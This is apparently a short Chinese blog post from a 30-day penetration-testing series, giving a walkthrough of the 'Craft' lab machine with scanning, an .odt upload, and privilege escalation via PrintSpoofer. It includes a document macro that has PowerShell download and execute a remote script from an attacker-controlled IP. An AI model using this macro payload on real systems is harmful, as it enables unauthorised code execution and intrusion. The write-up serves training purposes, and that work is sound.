iT邦幫忙

2025 iThome 鐵人賽
DAY 14
0
Security

滲透測試 30 天:從基礎到實戰系列 第 14

Day 14. Craft

17th鐵人賽
80 瀏覽

  • 分享至 

  • xImage
    •  

偵查

rustscan -a <target_ip> --ulimit 5000 -- -sC -sV -o scan_result.txt

列舉

  • 站點名稱 Craft 可以看看
  • 有上傳.odt的功能

試錯

需要構建一個 macro 來上傳到目標機器上,取得 normal user

Shell("cmd /c powershell ""iex(new-object net.webclient).downloadstring('http://192.168.45.184/oneliner.ps1')""")

提權

whoami /priv可使用printspoofer


上一篇
Day 13. Authby
下一篇
Day 15. Hutch
系列文
滲透測試 30 天:從基礎到實戰30
  1. 26
    Day 26. Nagoya
  2. 27
    Day 27. Resourced
  3. 28
    Day 28. Hokkaido
  4. 29
    Day 29. End(?)
  5. 30
    Day 30. To be continued...
完整目錄
圖片
  熱門推薦
圖片
{{ item.channelVendor }} | {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言
iThome鐵人賽
參賽組數
902
團體組數
37
累計文章數
19701
完賽人數
530
iT+看影片追技術 看影片追技術 看更多
熱門tag 看更多
15th鐵人賽 16th鐵人賽 13th鐵人賽 14th鐵人賽 17th鐵人賽 12th鐵人賽 11th鐵人賽 鐵人賽 2019鐵人賽 javascript 2018鐵人賽 python 2017鐵人賽 windows php c# linux windows server css react
熱門問題
熱門回答
熱門文章
IT邦幫忙